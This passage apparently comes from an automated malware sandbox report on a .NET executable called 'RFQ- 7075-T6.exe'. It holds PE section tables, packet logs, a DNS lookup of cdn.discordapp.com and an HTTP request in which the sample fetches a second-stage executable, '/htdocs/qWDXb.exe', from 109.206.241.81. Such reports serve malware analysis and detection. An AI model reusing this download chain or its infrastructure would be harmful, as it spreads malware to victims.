                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x31880x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x13140x1400False0.5328125SysEx File -5.2670505811726525IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0x40000x5780x600False0.39453125data3.959269745518616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x60000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0x40a00x2e4data
                  RT_MANIFEST0x43880x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  DLLImport
                  mscoree.dll_CorExeMain
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 8, 2022 22:21:08.834498882 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:08.834569931 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:08.834678888 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:08.865834951 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:08.865890980 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:08.915698051 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:08.915818930 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:08.918903112 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:08.918941021 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:08.919226885 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.053343058 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.286039114 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.323520899 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.323692083 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.323764086 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.323811054 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.323853970 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.323921919 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.323934078 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324002028 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324071884 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324071884 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.324095011 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324155092 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.324174881 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324342012 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324400902 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.324413061 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324476004 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324536085 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.324546099 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324564934 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324620008 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.324644089 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324775934 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324839115 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.324851036 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324923038 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.324985027 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.324990034 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325009108 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325082064 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.325094938 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325160027 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325220108 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.325222015 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325239897 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325301886 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.325313091 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325392008 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325452089 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.325457096 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325474024 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325535059 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.325546980 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325613976 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325675964 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.325680017 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325699091 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325752020 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.325766087 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325871944 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325931072 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.325937986 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.325956106 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326010942 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.326024055 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326103926 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326158047 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.326164007 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326183081 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326236010 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.326250076 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326344967 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326409101 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326417923 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.326431036 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326483965 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.326495886 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326533079 CEST44349739162.159.135.233192.168.2.4
                  Aug 8, 2022 22:21:09.326587915 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.334239960 CEST49739443192.168.2.4162.159.135.233
                  Aug 8, 2022 22:21:09.348371029 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.378936052 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.379136086 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.379342079 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.415420055 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415494919 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415546894 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415582895 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.415600061 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415652037 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415658951 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.415704966 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415755033 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415769100 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.415807009 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415853977 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.415855885 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415909052 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.415966034 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.444318056 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444381952 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444489002 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444535971 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.444540024 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444616079 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.444626093 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444679976 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444746017 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444763899 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.444797039 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444849968 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444874048 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.444900990 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444951057 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.444957018 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.445003033 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.445055008 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.445065022 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.445106983 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.445158005 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.445163965 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.445209980 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.445264101 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.445265055 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.445336103 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.445393085 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.445393085 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.445447922 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.445502996 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.474824905 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.474906921 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.474958897 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475011110 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475023985 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475059986 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475060940 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475111961 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475162983 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475183964 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475214958 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475265026 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475267887 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475317001 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475383043 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475404024 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475461960 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475512028 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475512981 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475564003 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475611925 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475616932 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475662947 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475713968 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475713968 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475765944 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475814104 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475814104 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475864887 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475913048 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.475924969 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.475965023 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476016045 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476017952 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.476067066 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476123095 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476125956 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.476172924 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476222038 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.476222038 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476275921 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476322889 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.476324081 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476376057 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476423979 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476427078 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.476478100 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476527929 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476533890 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.476578951 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476627111 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476634026 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.476677895 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476726055 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476732016 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.476778030 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476829052 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476830006 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.476877928 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.476946115 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.527652979 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.527740002 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.527793884 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.527844906 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.527870893 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.527894974 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.527909040 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.527946949 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.527997017 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528002024 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528049946 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528100014 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528100014 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528151035 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528199911 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528202057 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528250933 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528302908 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528304100 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528356075 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528404951 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528420925 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528459072 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528507948 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528513908 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528558969 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528609991 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528610945 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528661966 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528711081 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528712988 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528760910 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528809071 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528817892 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528862953 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528912067 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.528917074 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.528966904 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529020071 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529037952 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.529072046 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529123068 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529124022 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.529175043 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529226065 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529228926 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.529278040 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529329062 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529329062 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.529381037 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529433966 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529438972 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.529485941 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529536963 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529551029 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.529589891 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529642105 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529668093 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.529695034 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529746056 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529746056 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.529798985 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529849052 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529850006 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.529901981 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529953003 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.529954910 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.530004978 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.530056000 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.530056000 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.530108929 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.530162096 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.558588982 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.558675051 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.558725119 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.558777094 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.558806896 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.558825970 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.558844090 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.558881044 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.558931112 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.558933973 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.558985949 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559036016 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559041023 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.559087992 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559139013 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559145927 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.559192896 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559242010 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559242964 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.559293985 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559344053 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559344053 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.559432983 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559485912 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.559490919 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559545994 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559596062 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559616089 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.559649944 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559700966 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559746027 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.559756041 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559808969 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559809923 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:09.559860945 CEST8049741109.206.241.81192.168.2.4
                  Aug 8, 2022 22:21:09.559922934 CEST4974180192.168.2.4109.206.241.81
                  Aug 8, 2022 22:21:11.422429085 CEST4974180192.168.2.4109.206.241.81
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 8, 2022 22:21:08.782720089 CEST6209953192.168.2.48.8.8.8
                  Aug 8, 2022 22:21:08.804208040 CEST53620998.8.8.8192.168.2.4
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Aug 8, 2022 22:21:08.782720089 CEST192.168.2.48.8.8.80xfe0bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Aug 8, 2022 22:21:08.804208040 CEST8.8.8.8192.168.2.40xfe0bNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                  Aug 8, 2022 22:21:08.804208040 CEST8.8.8.8192.168.2.40xfe0bNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                  Aug 8, 2022 22:21:08.804208040 CEST8.8.8.8192.168.2.40xfe0bNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                  Aug 8, 2022 22:21:08.804208040 CEST8.8.8.8192.168.2.40xfe0bNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                  Aug 8, 2022 22:21:08.804208040 CEST8.8.8.8192.168.2.40xfe0bNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                  • cdn.discordapp.com
                  • 109.206.241.81
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.449739162.159.135.233443C:\Users\user\Desktop\RFQ- 7075-T6.exe
                  TimestampkBytes transferredDirectionData


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.449741109.206.241.8180C:\Users\user\Desktop\RFQ- 7075-T6.exe
                  TimestampkBytes transferredDirectionData
                  Aug 8, 2022 22:21:09.379342079 CEST663OUTGET /htdocs/qWDXb.exe HTTP/1.1
                  Host: 109.206.241.81
                  Connection: Keep-Alive
                  Aug 8, 2022 22:21:09.415420055 CEST665INHTTP/1.1 200 OK
                  Date: Mon, 08 Aug 2022 20:21:09 GMT
                  Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                  Last-Modified: Mon, 08 Aug 2022 17:34:39 GMT
                  ETag: "2e400-5e5be3af3ad6a"
                  Accept-Ranges: bytes
                  Content-Length: 189440
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
